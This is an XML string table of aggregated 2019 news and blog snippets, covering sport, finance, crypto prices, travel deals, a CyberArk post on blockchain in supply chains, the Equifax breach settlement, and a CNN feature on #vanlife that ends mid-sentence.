  <si>
    <t>The two deaths and a third non-fatal case were reported in separate states, officials say. The post ‘Smoked salmon’ listeria kills two in Australia appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>ANTIQUES ROADSHOW delivered yet another shocked in a recent instalment as one man was stunned to learn that the old wooden toy rattle his partner had bought for £5 was worth a huge amount more. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Windsor: Double Room for Two with Optional Breakfast and Dinner at Luxury Goswell House The post Windsor: Double Room for Two with Optional Breakfast and Dinner at Luxury Goswell House appeared first on 4UTODAY Online since 2004.</t>
  </si>
  <si>
    <t>Sterling slips below $1.23 against US dollar and also falls sharply against the euro The pound has fallen to its lowest level for more than two years as investors react to the escalating no-deal rhetoric of Boris Johnson’s government.Sterling slipped below $1.23 against the US dollar and fell sharply against the euro on the international currency markets on Monday, as cabinet ministers ramped up their warnings over a no-deal Brexit. Continue reading… Read More</t>
  </si>
  <si>
    <t>(1:00) – What Can Investors Expect From The Legal Cannabis Market? (4:45) – The Cannabis ETF by Innovation Shares: THCX (12:50) – Innovation Shares NextGen Protocol ETF: KOIN (17:20) – How Do These ETFs Fit Into An Investors Portfolio? Podcast@Zacks.com In this episode of ETF Spotlight, I speak with Matt Markiewicz, Managing Director at Innovation Shares. We start with the case for investing in marijuana stocks. Some have compared it to investing in alcohol post-Prohibition. According to Barclays, the US cannabis market would be $28 billion if legalized today, growing to $41 billion by 2028. But these stocks are very volatile. Recreational use of marijuana is legal in 11 US states and the District of Columbia. Illinois became the latest state to legalize recreational use effective January 1, 2020. Medical use of cannabis is legal in in 33 states, but it remains illegal at the federal level. The Cannabis ETF THCX provides exposure to a basket of stocks that are expected to benefit from growth of the hemp and legal marijuana industries. Please visit THCXetf.com to learn more about this ETF. Tilray TLRY, Cronos CRON, Aurora Cannabis ACB and GW Pharmaceuticals GWPH are its top holdings. There are four more pot ETFs on the market now—ETFMG Alternative Harvest ETF MJ, AdvisorShares Pure Cannabis ETF YOLO, Amplify Seymour Cannabis ETF CNBS and Cambria Cannabis ETF TOKE. Three of these—YOLO, CNBS and TOKE–are actively managed. How is THCX different from other pot ETFs? Blockchain ETFs have seen some revival of investor interest over the past few months, with the rise in bitcoin prices. The Innovation Shares NextGen Protocol ETF KOIN focuses on companies involved with blockchain technology. Its top holdings are Taiwan Semiconductor TSM, Intel INTC and Nvidia NVDA Tune into the podcast to learn more about these ETFs. Make sure to be on the lookout for the next edition of ETF Spotlight! If you have any comments or questions, please email podcast@zacks.com. Want key ETF info delivered straight to your inbox? Zacks’ free Fund Newsletter will brief you on top news and analysis, as well as top-performing ETFs, each week. Get it free &gt;&gt; Click to get this free report GW Pharmaceuticals PLC (GWPH) : Free Stock Analysis Report NVIDIA Corporation (NVDA) : Free Stock Analysis Report Intel Corporation (INTC) : Free Stock Analysis Report Taiwan Semiconductor Manufacturing Company Ltd. (TSM) : Free Stock Analysis Report Tilray, Inc. (TLRY) : Free Stock Analysis Report Aurora Cannabis Inc. (ACB) : Free Stock Analysis Report Cronos Group Inc. (CRON) : Free Stock Analysis Report Innovation Shares NextGen Protocol ETF (KOIN): ETF Research Reports THE-CANNABIS (THCX): ETF Research Reports ETFMG Alternative Harvest ETF (MJ): ETF Research Reports AdvisorShares Pure Cannabis ETF (YOLO): ETF Research Reports To read this article on Zacks.com click here." data-reactid="40"&gt;Want the latest recommendations from Zacks Investment Research? Today, you can download 7 Best Stocks for the Next 30 Days. Click to get this free report GW Pharmaceuticals PLC (GWPH) : Free Stock Analysis Report NVIDIA Corporation (NVDA) : Free Stock Analysis Report Intel Corporation (INTC) : Free Stock Analysis Report Taiwan Semiconductor Manufacturing Company Ltd. (TSM) : Free Stock Analysis Report Tilray, Inc. (TLRY) : Free Stock Analysis Report Aurora Cannabis Inc. (ACB) : Free Stock Analysis Report Cronos Group Inc. (CRON) : Free Stock Analysis Report Innovation Shares NextGen Protocol ETF (KOIN): ETF Research Reports THE-CANNABIS (THCX): ETF Research Reports ETFMG Alternative Harvest ETF (MJ): ETF Research Reports AdvisorShares Pure Cannabis ETF (YOLO): ETF Research Reports To read this article on Zacks.com click here.</t>
  </si>
  <si>
    <t>Despite some very good moments during the 2018 season, including the playoffs, Sony Michel has concerns that keep him from being picked before Round 4 in non-PPR leagues and Round 5 in PPR. He missed the Patriots’ offseason minicamps reportedly because he had his knee scoped. He also saw the team add bruising back Damien Harris in the draft, and Harris stood out during his absence. Over his past five games, including the playoffs, Michel averaged 20.6 carries per game and 4.9 yards per run with seven rushing touchdowns. For him to keep that up, his knees would have to stay healthy and the Patriots would have to continue running the ball. Neither of these things seem likely. Definitely keep an eye on Michel in training camp, but he could be a bust candidate in 2019.</t>
  </si>
  <si>
    <t>Eric Perez, founder and the first CEO of the Toronto Wolfpack, has already earned the green light from the governing body of English rugby league to move the Hemel Stags.</t>
  </si>
  <si>
    <t>Lucy Manly</t>
  </si>
  <si>
    <t>The convicted serial killer is being cared for by young female nursing staff while in prison hospital.</t>
  </si>
  <si>
    <t>Breaking Overnight: Puerto Rico's embattled governor Ricardo Rosselló is stepping down after 12 days of historic, and at times violent protests. He will leave office next Friday, August 2nd. Our @DavidBegnaud has been covering the unrest from Puerto Rico since it began. pic.twitter.com/yxNY7FkMy7 — CBS This Morning (@CBSThisMorning) July 25, 2019 When Trump was saying […]</t>
  </si>
  <si>
    <t>Cheapest hotel after late night in South Korea The post Cheapest hotel after late night in South Korea appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>'A Beautiful Day in the Neighborhood' hits theatres Nov. 22.</t>
  </si>
  <si>
    <t>What's old is new again as the milk bar makes a comeback.</t>
  </si>
  <si>
    <t>Editor’s Note: In late 2018, CyberArk published five cybersecurity predictions for 2019. This deep-dive blog series will examine each prediction in detail to help organizations stay on top of emerging threats and out-innovate and out-maneuver cyber attackers. One of the goals for this series is to provide updates on how these trends develop and progress over the course of the year. Today’s topic is blockchain for the supply chain industry. It only takes a quick Google search of “supply chain diagrams” to see how complicated the modern day supply chain has become. There are numerous – sometimes hundreds or even thousands – of suppliers, partners, third parties, bankers and lawyers involved in in the process of producing and distributing products for consumers. As a result, simple data and financial transactions often turn into lengthy, multi-step procedures. Compounding these challenges, supply chains are increasingly frequent targets of cyber crime. A recent Supply Chain Insights study revealed that the number one event impacting supply chains from 2013 to 2018 was cyber attacks or computer hacking. Blockchain has the potential to turn the tables, helping organizations streamline supply chain management (SCM), bolster cybersecurity across each touchpoint, maximize customer value and maintain a competitive edge. But, first, here’s what you need to know about blockchain technology. Blockchain 101 Blockchain is an open, distributed ledger that can record business transactions between parties in a secure, verifiable and permanent way. Every time a person records a blockchain transaction, they add a record – or “block” – that others in that particular chain (and only those in that blockchain) can read. Each block contains a cryptographic hash (think of it as a cyber fingerprint), an unchangeable timestamp, the transaction data (typically represented as a “Merkle tree”) and the hash of the previous block to link the two together. Forrest Williams from the CyberArk Red Team explains it like this: “You can imagine the blockchain as millions of paper bank statements ‘chained’ together with invisible cryptographic chains and new sheets of paper are constantly added as new people spend money.” Once it is recorded, a block cannot be altered without also altering all other blocks. This means that if someone does attempt to change or erase a block, the blockchain – which is managed and validated by a peer-to-peer network – will compare it to the other distributed copies of the block, quickly find the discrepancy and reject the change, ensuring that the original block remains intact. Why Blockchain for the Supply Chain? Large manufacturers are increasingly turning to blockchain to simplify complex “chain of command” processes, reduce costs and transform their supply chains – from sourcing to warehousing to delivery to payment. For example, food and beverage giant Pepsi recently conducted a blockchain trial in Asia Pacific that resulted in a 28 percent boost in supply chain efficiency. Walmart also implemented a blockchain system to better trace food products to their original source and maintain food safety – from tracking pork from China to tracing mangoes from Mexico. And IBM and Maersk co-developed TradeLens, a global shipping supply chain service that uses blockchain technology to help improve process efficiency. Yet, perhaps blockchain’s greatest promise for the supply chain is enhanced data security for digital records. Following allegations of nation-states targeting the supply chain at the chip level to embed backdoors into both B2B and consumer technologies, organizations are increasingly embracing blockchain to secure their supply chains and reduce the risk of fraud. The distributed nature of blockchain makes it very well suited to validate every step in the supply chain – including the authenticity of hardware and software. For example, if a wholesaler receives information from a manufacturer, blockchain can authenticate the sender of the data, validate the time the data was sent and ensure that the information has not been tampered with during transmission. With this strengthened security and transparency across each level of the supply chain, organizations are empowered to optimize processes and better manage customer demand. While blockchain has certainly sparked positive change across the supply chain industry, widespread adoption will not happen overnight. Given its distributed nature, the greatest barriers to blockchain are cooperation and scale. To gain true end-to-end visibility and enhanced data security across the supply chain, it’s not enough for one or two suppliers to employ the technology – all parties must join the blockchain platform and agree to abide by its standards. Our next installment in the Predictions series will feature the future of trade wars and commercial espionage. The post Supply Chain Meets Blockchain: A Perfect Match appeared first on CyberArk. *** This is a Security Bloggers Network syndicated blog from CyberArk authored by David Higgins. Read the original post at: https://www.cyberark.com/blog/supply-chain-meets-blockchain-a-perfect-match/</t>
  </si>
  <si>
    <t>A key recommendation from the recent Samuel review is that we need a simple method to compare performance.</t>
  </si>
  <si>
    <t>Ethereum price got bitten by the bear. The coin is currently suffering a price drop. The traders had high hopes from the coin as the last two days reflected an improvement in the ETH price. Ethereum and Bitcoin opened with a downfall today. The top players are drowning in the crypto market along with many other cryptocurrencies. ETH price is currently trading at 207 USD. The coin is expected to remain in the same range during the day. We can expect an upsurge in the upcoming weeks. ETH to USD Price Comparison: The ETH price chart is taken from TradingView on 28th July 2019 at 04:11:02 UTC. Ethereum Chart By TradingView Yesterday, the coin opened at $219. The coin kept dealing around $224. Soon, the coin dropped from $220.76 to $206.77 by 6.40%. The coin took another drop from $206.62 to $203.23 by 1.71%. The coin started dealing at $207. The coin kept the coin around at the same level since then. Today, the coin opened at $207 and is dealing at the same. There is not much movement in the coin. Summary of Ethereum: The price of Ethereum is dealing at 207.71 USD. ROI stands at 7323.00%. The Market Cap is marked as 22,507,773,292 USD. 24-hour volume is noted as 5,900,111,485 USD. Circulating Supply is 107,082,349 ETH. Ethereum Price Prediction and Conclusion: The traders already invested in Ethereum must be at discomfort due to the market drop. Well, they should wait because Ethereum is a stable and profit yielding coin. The currency would soon track the way out of the market surge and shine again. Ethereum price is expected to touch up to $500 by the end of 2019. We are quite apprehensive about the development of price. The long term and short term investment both look promising with Ethereum.</t>
  </si>
  <si>
    <t>From: Perth (PER) To: Osaka, Japan (KIX) Airline: ANA Alliance: Star Alliance How: via Tokyo When: Nov/Dec Examples: $622 Return - 03 Nov to 16 Nov - https://bookings.beatthatflight.com.au/flights/per0311kix161... $622 Return - 01 Nov to 14 Nov - https://bookings.beatthatflight.com.au/flights/per0111kix141... $622 Return - 03 Nov to 13 Nov - https://bookings.beatthatflight.com.au/flights/per0311kix131... $622 Return - 03 Nov to 14 Nov - https://bookings.beatthatflight.com.au/flights/per0311kix141... $622 Return - 02 Nov to 16 Nov - https://bookings.beatthatflight.com.au/flights/per0211kix161... $622 Return - 02 Nov to 15 Nov - https://bookings.beatthatflight.com.au/flights/per0211kix151... $622 Return - 02 Nov to 14 Nov - https://bookings.beatthatflight.com.au/flights/per0211kix141... $622 Return - 05 Nov to 14 Nov - https://bookings.beatthatflight.com.au/flights/per0511kix141... $622 Return - 06 Nov to 14 Nov - https://bookings.beatthatflight.com.au/flights/per0611kix141... $622 Return - 05 Nov to 18 Nov - https://bookings.beatthatflight.com.au/flights/per0511kix181... $622 Return - 17 Nov to 01 Dec - https://bookings.beatthatflight.com.au/flights/per1711kix011... $622 Return - 14 Nov to 28 Nov - https://bookings.beatthatflight.com.au/flights/per1411kix281... $622 Return - 20 Nov to 01 Dec - https://bookings.beatthatflight.com.au/flights/per2011kix011... Beat That Flight For more deals like this from Beat That Flight, visit our site - sign up for updates, deals, flight hacks and error fares, or follow us on Facebook or on twitter. Deals from Sydney, Deals from Melbourne, Deals from Adelaide, Deals from Canberra, Deals from Perth, Deals from Darwin, Deals from Brisbane, Deals from Hobart We have an app now too, if you're on Android!</t>
  </si>
  <si>
    <t>Ronny Lerner</t>
  </si>
  <si>
    <t>We kick things off today with Hawthorn taking on the Brisbane Lions in Launceston and Carlton hosting Adelaide at the MCG.</t>
  </si>
  <si>
    <t>Automatic Promotion the Aim Once Again For Sunderland in League One SUNDERLAND, ENGLAND – JULY 27: Sunderland manager Jack Ross during the pre-season friendly game between Sunderland AFC and SC Heerenveen at Stadium of Light on July 27, 2019 in Sunderland, England. (Photo by Ian Horrocks/Sunderland AFC via Getty Images) Sunderland will spend a second successive season in League One. The Black Cats suffered play-off final heartache last season and will want automatic promotion at the second attempt. Key players have been kept and several have been brought in. Should lessons be learned from last season, Sunderland should be fighting for automatic promotion. Sunderland Season Preview Last season – 5th League One This season’s division – League One Home Stadium – Stadium of Light Opening game – Oxford United Last Season Two relegations in a row saw Sunderland fall from the Premier League to League One. New owners came in, as well as a new manager in Jack Ross. Many new players also arrived as the club targeted automatic promotion at the first attempt. An eventful season saw the Black Cats fall short of their target. In and around the automatic promotion places all season, Sunderland finished in the play-off places. Defeat in the final to a last-minute goal against Charlton Athletic consigned the club to at least one more season in England’s third tier. Pre-Season Off the field, takeover talks were dominating headlines during the first part of the summer. A deal to sell the majority of the club’s shares was close to happening. However, the deal, although close, couldn’t be agreed. Mark Campbell revealed in the Sunderland Echo why his takeover bid failed: “We had the club valued and our price that we agreed to buy the club at the very start, when we first made the bid, dramatically changed as time went on,” he explained. “There were certain components of the deal at the end that weren’t going to work for the club.” On the field, Sunderland began their preparations in pre-season with a comfortable 2-0 victory at South Shields. A trip to Portugal saw the team face a Benfica B team and also Belenenses. One draw and one defeat saw the Black Cats return to Wearside without scoring a goal. However, at this stage, fitness is the most important thing. Dutch side SC Heerenveen then travelled to the Stadium of Light and left with a single goal victory. Transfers in So Far Goalkeeper Lee Burge and defender Jordan Willis arrived from Coventry City after their contracts expired. The Black Cats beat off competition from several Championship clubs to sign both players. Defender Conor McLaughlin signed after his contract expired at Millwall, while striker Marc McNulty arrived on a season-long loan recently from Reading and Walsall’s captain last season, George Dobson, signed permanently for an undisclosed fee. Transfers Out So Far Long-serving midfielder Lee Cattermole was a surprise departure this summer. The combative Cattermole had been with the club for ten years. Full-backs Donald Love and Reece James also departed. They signed for Shrewsbury Town and Doncaster Rovers respectively. Goalkeepers Robbin Ruiter and Max Stryjek left for PSV Eindhoven and Eastleigh. Defender Lamine Kone also left on a permanent deal having returned to Strasbourg where he spent last season on loan. Sunderland Season Preview: Key Players Aiden McGeady McGeady was Sunderland’s main man last season. He has committed himself to the club and it is highly likely he will be the main man once again. He, single-handedly at times, dragged the Black Cats through games with his goals and assists. If Sunderland are to achieve their aim of automatic promotion, McGeady could be the key to unlocking some stubborn League One defences. Will Grigg Should Grigg hit the heights of his previous seasons in League One, he could top the scoring charts. Signed in January, the former Wigan Athletic hitman has had a frustrating time on Wearside. Niggling injuries prevented Grigg from finding form. However, with a successful pre-season (fitness-wise) behind him, this coming season could be a success. Chris Maguire ‘The King’, as he is affectionately known, had both successful and frustrating times last season. His skill and passion made him an instant fan-favourite. However, injuries and a spell out of the first-team due to several out-of-sorts performances, stopped his season being as good as it could have been. An on-form Chris Maguire is a game-changer with his stunning goals. He could be a major factor in Sunderland having a successful season. Jon McLaughlin Signed on a free transfer last summer, McLaughlin was the reliable, safe pair of hands needed after some calamitous displays from goalkeepers before him. A reported transfer target for several clubs after his impressive displays last season, Sunderland will be desperate to keep their number one. Another big player who can earn the team points on his own. More Huge Attendance’s Expected An average attendance of over 32,000 watched their team at the Stadium of Light last season. A League One record of more than 46,000 saw a victory on Boxing Day. This season close to 25,000 season tickets are expected to be sold, a staggering number for League One. Average attendances are therefore expected to be over 32,000 once again. Season Expectations This season’s goal, like last season, is promotion. Sunderland fell just short last season having endured upheaval on and off the field. This summer, although takeover talks have been ongoing, manager Jack Ross has had a squad to deal with, unlike last year. This time last summer, Ross was struggling for numbers with many comings and goings. Anything less than promotion will be seen as a huge disappointment. A club the size of Sunderland should not and cannot stay in the lower tiers of the Football League for too long. Financially it would become more difficult. Even this summer, deals in the millions are not being spoken off. As many fans, players, staff and owners alike would say, promotion for Sunderland is a must this season. As fans will know, it is rare that their club does things the easy way. Just one season would be nice though. This post Automatic Promotion the Aim Once Again For Sunderland in League One appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>Lexy Hamilton-Smith</t>
  </si>
  <si>
    <t>Student anger results in violent clashes at the University of Queensland over the Hong Kong pro-democracy protest movement and persecution of minorities in China.</t>
  </si>
  <si>
    <t>Workers at a Perth court where a woman was fatally stabbed during a mediation session with her ex-partner have described the horrific scene, with some weeping as they testified at his murder trial.</t>
  </si>
  <si>
    <t>Sharon Tidnam had breached a court order to stop dogs in her care from making a noise nuisance. The post Kennels must pay £93k over barking dogs appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>OUTLANDER historian Frank Randall was portrayed as being an honourable man and deeply in love with his wife Claire Randall on the time-travelling STARZ drama, but if fans delve more deeply into the truth of writer Diana Gabaldon’s character, he was quite the opposite and actually did something completely unforgivable when he betrayed his daughter Brianna Randall Fraser as well as his wife. Daily Express :: TV and Radio Feed Outlander season 5 spoilers: Frank Randall’s betrayal revealed in Jamie Fraser death twist</t>
  </si>
  <si>
    <t>Chris Reason</t>
  </si>
  <si>
    <t>Brisbane swimmer Shayna Jack is in hiding after it was revealed last night the 20- year-old failed a doping test and been suspended before quietly being sent home from Japan.</t>
  </si>
  <si>
    <t>Any photographer worth their salt knows that at some point, they’re going to be losing lens caps – either while out in the field or somewhere at the bottom of their bag. Most of us have spares, but for those who don’t Canon may have an answer to your problems. The Japanese camera manufacturer has recently filed a patent (number 2019-113645) in its home country for a barn door-like lens cap that simultaneously works as a lens hood as well. First spotted by Canon Watch, the “invention works as a lens hood function at the time of shooting and as a lens protection function at the time of non-shooting, thus eliminating the need for lens cap attachment / removal and barrier opening / closing operations”. The idea behind Canon’s design is that it will be permanently attached to the lens, so losing another lens cap might be a thing of the past. However, Canon only uses the term “digital camera” in the patent, so whether the new lens cap design will make its way to the new RF-mount lenses or the older EF, EF-M or EF-S lenses remains to be seen. Instead, the patent seems to be for lenses with extending barrels that are typical for point-and-shoot snappers. Nothing new There have been solutions for the lost lens cap problem in the past – Canon is by no means the first company to try and solve this issue. The Olympus LC-63A lens cap has been around for a very long time now, and was designed to fit on the XZ-1 and XZ-2 compact cameras. It’s attached to the lens barrel via a screw mount and automatically opens and shuts when using a button on the camera itself. For those of us with multiple lenses for DSLRs or mirrorless cameras, Kuvrd (as in ‘covered’) launched a very successful Kickstarter campaign in 2017 for a silicone-based one-size-fits-all lens cap that claimed to be waterproof, dirt-proof, shock-absorbent, portable and malleable, but it wasn’t designed to be permanently attached to the lens itself. While Canon’s design is still just a patent, it would be nice to see a major manufacturer provide a solution to a common problem that most photographers face. Best travel cameras available in 2019 Intology Limited: http://www.intology.co.uk/about-us.php Twitter: https://twitter.com/Intology Facebook: https://www.facebook.com/Intology Read more: Canon patents a lens cap you can’t possibly lose</t>
  </si>
  <si>
    <t>Calum Woodger</t>
  </si>
  <si>
    <t>Dundee first-team coach Dave Mackay believes they will be “absolutely flying” this season if they can hit top gear.</t>
  </si>
  <si>
    <t>KANSAS CITY, Mo. - Cavan Biggio hit the go-ahead homer in the eighth inning, Randal Grichuk and Teoscar Hernandez also went deep, and the Toronto Blue Jays rallied past the Kansas City Royals 7-3 on Monday night.</t>
  </si>
  <si>
    <t>Bruce Matichuk</t>
  </si>
  <si>
    <t>Business owners and managers increasingly deal with information overload, including from camera feeds. The cost outlay for a good camera system with extensive storage is dropping daily and new technologies that promise to process all this information continue to emerge. But although it’s valuable information, it’s also exceedingly time consuming to sift through all the images. However, like the business intelligence wave of the last decade, visual intelligence promises to revolutionize the way businesses handle visual information. And although consumer groups are pushing back over privacy concerns, the need to watch over and protect assets outweighs any potential fallout from using visual recording technology. Cameras are seemingly everywhere and growing in number. They’re placed on entranceways, exits, in front of bathrooms, on loading docks, shopping aisles, in ceilings and every other place you can find people. Most camera feeds run to a back-office monitoring area or to an offsite monitoring service. In the monitoring rooms, people watch several screens in search of anomalous behaviour. The problem with manual monitoring is that people miss things – they get tired and they make mistakes. The impact to a business of a monitoring mistake can range from minor to catastrophic. Manual monitoring can also create a security gap because people can be distracted. A well-timed crisis in camera’s view can be used to distract monitoring from activity in another location. Some businesses with cameras don’t do real-time monitoring. Instead, videos that are thought to contain key data are reviewed when an incident occurs. There are several problems with this approach: incidents are easily missed, reviewing footage is time consuming and manual review can be very expensive. The alternative is to employ visual intelligence. Visual intelligence, an emerging technology, has become incredibly effective in recent years due to advances in artificial intelligence, in machine learning and in the computing hardware that runs intelligence processes. Some of the applications include face identification, incident recognition, behaviour monitoring, object identification and even face or activity prediction. There are obvious advantages over manual processes: costs can be considerably reduced; recognition can be performed continuously; recognition systems can’t be distracted; analytical intelligence can be performed in ways that exceed human capacity. One application of visual intelligence is implementing do-not-allow policies. In retail stores, banks, secure buildings and other high-security areas, guards are often used to watch for known individuals who shouldn’t be allowed entrance. But guards have limited and inefficient memories and are easily distracted. Shrinkage (theft) costs retail businesses in North America over $45 billion annually and retail stores are looking for ways to reduce that financial burden. Face recognition systems have been used effectively in these environments to identify, in real time, individuals who shouldn’t be allowed entrance or at least monitored carefully. Behaviour recognition can also detect and predict actions in real time. In long-term care facilities, patients fall when unsupervised. And in unmonitored public areas, vandals and graffiti artists can quickly damage a building, requiring costly repairs. Behaviour recognition technology can detect when these actions are about to happen and immediately send specific messages to appropriate individuals to manage such situations. Visual intelligence is a growing trend in the retail, security and health industries. The technology is effective and business owners are finding many more applications daily. Bruce Matichuk is an artificial intelligence specialist and the chief technology officer of AiDANT Intelligent Technology, developer of AiDANT Recognition, a visual intelligence system. © Troy Media The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post Visual intelligence is the next wave of digital security appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
    <t>Birmingham: Double Room with for Two with Breakfast and Option for Dinner at 4* Ramada Solihull The post Birmingham: Double Room with for Two with Breakfast and Option for Dinner at 4* Ramada Solihull appeared first on 4UTODAY Online since 2004.</t>
  </si>
  <si>
    <t>Mack Horton anchors Australia to gold in the men's 4x200m freestyle relay, after Cate Campbell and Matt Wilson claim silver medals at the world swimming championships in South Korea.</t>
  </si>
  <si>
    <t>Source: https://www.bbc.co.uk/news/technology-49070596 Equifax to pay up to $700m to settle data breach The credit score agency has agreed a settlement after hackers stole 147 million people’s details. Source: https://www.bbc.co.uk/news/technology-49070596 The post Equifax to pay up to $700m to settle data breach appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>(CNN) — From the outside, it looks like a dream life. Rugged mountains, sweeping canyons, the road ahead — all framed through the open back doors of an achingly hip camper van, replete with artfully arranged fairy lights, cozy blankets, and, at the center, a super attractive millennial couple. This is #vanlife, an Instagram aesthetic that, according to those who subscribe to it, is apparently more of a movement. There are more than 5 million posts tagged with the hashtag and counting, with popular Van Lifers racking up thousands of followers with their dreamy dispatches from the road. But what’s it really like to travel across country in a very cool — but still, by it’s very nature, very tiny and restrictive — vehicle? And what’s it like when not just your lifestyle, but your relationship, becomes commodified? The answer? More complicated than you might think. Alternative lifestyle Traveling around the world in a camper van sounds pretty idyllic. Courtesy Stephanie Rhodes and Matt HB/Lannoo Publishers For Texan Lisa Jacobs, a watershed moment in her personal life led her to pack in her job as a lawyer and pack up her things into a van. “I’d started going down that path of getting a home and getting a partner — and all these things that I thought were supposed to make me happy,” she tells CNN Travel. “And I was not happy.” Lisa Jacobs is a solo female traveler with a van. Courtesy Lisa Jacobs/ @vacayvans When her mother was diagnosed with breast cancer and passed away shortly after, Jacobs experienced a gargantuan shift in her priorities. “All the things that I was worrying about — all the job, work deadlines, and things that I’d said, things that embarrassed me or what other people thought, I just realized that nothing matters, because our time here is so, so short. “And that propelled me into rejecting a lot of the things I had embraced previously.” Jacobs discovered the great outdoors via her cell phone. Stumbling upon the Van Life community on Instagram, she was swept away by its allure. She stayed up all night researching. The next day, she bought her van on Craigslist — a Nissan ND 2500. Lisa’s Instagram account, @vacayvans, is something of an anomaly in the Van Life world. Sure, there’s still a lot of millennial wish fulfillment: she does yoga — in fact, she’s about to head to Bali to solidify her status as a yoga instructor — she’s got a lot of house (van?) plants and brightly colored throws that match her shock of bright pink hair. The key difference? She documents her life as a solo female traveler. The Van Life Instagram community has a very specific aesthetic: athletic, long-limbed, white, blonde couples offering an Urban Outfitters-tinted view of the great outdoors. Lisa’s journey didn’t start off solo, she explains. When she first plotted her life off the grid, she had a long-term boyfriend in tow. “We had been sharing our big plans to live this beautiful life together as a Van Life couple. And then two weeks in, we break up,” she says. “It was not the ideal ‘Instagram Van Life Couple’ that I thought I was part of.” Van Life couples A lot of people who post under #VanLife are couples. Courtesy Emily King and Corey Smith/ @wheresmyofficenow So what is the “ideal” Van Life couple? Maybe twenty-somethings Emily King and Corey Smith, the couple behind @wheresmyofficenow, a picture-perfect Instagram account documenting their adventures in their second-hand 1987 Vanagon Camper. There are shots of a bikini-clad King making coconut and almond pancakes, a basket of limes and fruits hanging behind her and two gorgeous dogs lounging to her right. In another snap, the couple parks for the night in Baja California, Mexico, ready for a barbecue with friends, the sun setting in the distance. Further down the grid, King’s sitting on top of the van in Texas, purple-hued mountains and skies behind her. It’s not hard to get a bit lost in the perfection. “Instagram is largely attractive white people in vans” Corey Smith of @wheresmyofficenow Corey Smith says he graduated around the time of the 2008 recession. Like former lawyer Jacobs, he felt a disconnect between what he’d been promised adult life would be like, and what it actually was like. “If you’re willing to take the risk to make your own path, you have the ability to do some pretty sweet stuff,” he tells CNN Travel. The couple purchased their van in 2012 and, as they crisscrossed all over North America, their Instagram account grew and grew. Now, Smith says #VanLife is “extremely saturated.” It’s hard to make your posts unique, he says. The photographs under the hashtag are alluring and artsy, but all very similar. They’re “van porn,” as Smith calls it. The lifestyle can look like the ultimate wish fulfillment. Courtesy Emily King and Corey Smith/ @wheresmyofficenow He adds that he was initially very skeptical about social media, concerned that the couple’s experiences would be taken over by the need to create content for their followers. “And I would say to some degree, that’s come true,” he admits. “But we don’t drive places to take pictures. The pictures happen naturally, as we go about our day. If I want Emily to stand a certain way, I might ask her to do something again, but I don’t pick a point on a map or go a certain place to get a picture.” Smith knows they play into the “over-glorification” of the van lifestyle. More recently the couple has tried to break away from some of the Van Life cliches. “There’s a lot of moments that are in between that aren’t as glorious, but I think as important to share,” he says. Van Lifer Alexandra Ulmke, @agirlandhervan on Instagram, who started off blogging about her life as a solo female traveler but is now in a long-term relationship, said she definitely experienced some difficulties with the expectation versus reality. “Loneliness was a huge issue for me,” she says. It was a journey, she says, to embrace solitude, and find comfort in it. She describes her first few years on the road as “wanting a revelation, and not getting it.” It’s not just her relationship that’s led her to her present-day happiness. She says it was learning what Van Life truly meant: embracing the outdoors and all it has to offer, and learning to be candid online. International movement Calum Creasey and Lauren Smith are British Van Lifers who also have an enviable lifestyle. Courtesy Calum Creasey/Lannoo Publishers Across the pond in the UK, Van Lifers Calum Creasey and Lauren Smith based in Cornwall, are the British epitome of Van Life #couplegoals. Whereas American Van Life Instagram accounts tend to be bikinis and sandy beaches, mountains and tans, Creasey and Smith’s account @therollinghome is a bit more “hygge” in its vibe. All the images are bathed in a soft old-school-film-camera glow, whether it’s Smith captured cleaning her teeth on a clifftop or their converted Volkswagen T4 van parked up by the ocean on a blustery seaside day. It’s still wish fulfillment, just of a different sort. The couple, now turning 30, have been together since they were 18, known one another since they were 12 — and Van Life’s been intertwined with their romance from the beginning Creasey tells CNN Travel he remembers driving around to Lauren’s parents’ house and showing her the first van he’d converted. The duo, who’d always documented their adventures, fell into the Instagram community somewhat accidentally. Van Life isn’t just a summer thing. Courtesy Dane Faursch/Lannoo Publishers “I guess there was a point where we kind of realized that our van and our travels and all of the photos that we had were really powerful,” says Creasey. “People really resonated with them.” “Not necessarily because of us as people, but more the situations, the environment that the van will be in. They really evoke a deep feeling in people when they see them.” It’s the excitement, trepidation, the promise of simplicity, of escapism. The couple have made vans their life and work, even though they no longer live full time in their Volkswagen. Sustainability question Is Van Life sustainable? Courtesy James Bowden and Hannah Stocks/Lannoo Publisher Those living on the road stress that life’s simpler, more sustainable. It’s a rejection of capitalism and material possessions. “You can’t have a closet full of clothes, you can’t have every piece of gear you want, you’ve got to pick and choose, only have the things you necessarily definitely need,” says Corey Smith. That doesn’t mean you won’t see the odd bit of spon-con scattered among these feeds, advertizing flasks, for example, or outdoorsy clothing — and, therefore, promoting consumption. The Van Lifers also admit driving around isn’t necessarily the most eco-friendly pastime. A lot of Van Lifers find they’re naturally more eco-friendly while on the road. Courtesy Jessica Riddell/Lannoo Publishers Still, Creasey points a direct correlation between Van Life and waste management. “When you’re in a van, you can never really escape it — the amount of plastics after a meal that you have to dispose of, let’s say; they’re there, they’re close to you, they’re in close proximity to you.” Visiting beautiful natural spots, he says, also prompts you to consider man’s impact on the environment. Smith agrees — he often ends up parking up on national forest land and will sometimes pick up trash other people have left behind. “That’s a thing within the van community, to really make sure you’re taking care, you’re stewarding land and stewarding oceans,” he says. Relationship goals? Living simply is the crux of Van Life. Courtesy Stephanie Rhodes and Matt HB/Lannoo Publishers So what should you do if you want to join the Van Life community? First off, you don’t need a van — at least not according to Smith. He says you should assess your needs and your wants, live more simply, and get outdoors. “Don’t do it because it’s something that’s cool and prescribed to you on the internet and Instagram,” he says. “Do it because you have a desire to travel and a desire to get out there.” But is it as simple as that? Scrolling through Instagram, the community seems to be dominated by a very specific type of person. It’s a pretty confined space to spend all your time in. Courtesy Calum Creasey/Lannoo Publishers It doesn’t necessarily look particularly inclusive or accepting. “I get it — Instagram is largely attractive white people in vans,” says Smith. But, he adds, of course these aren’t the only 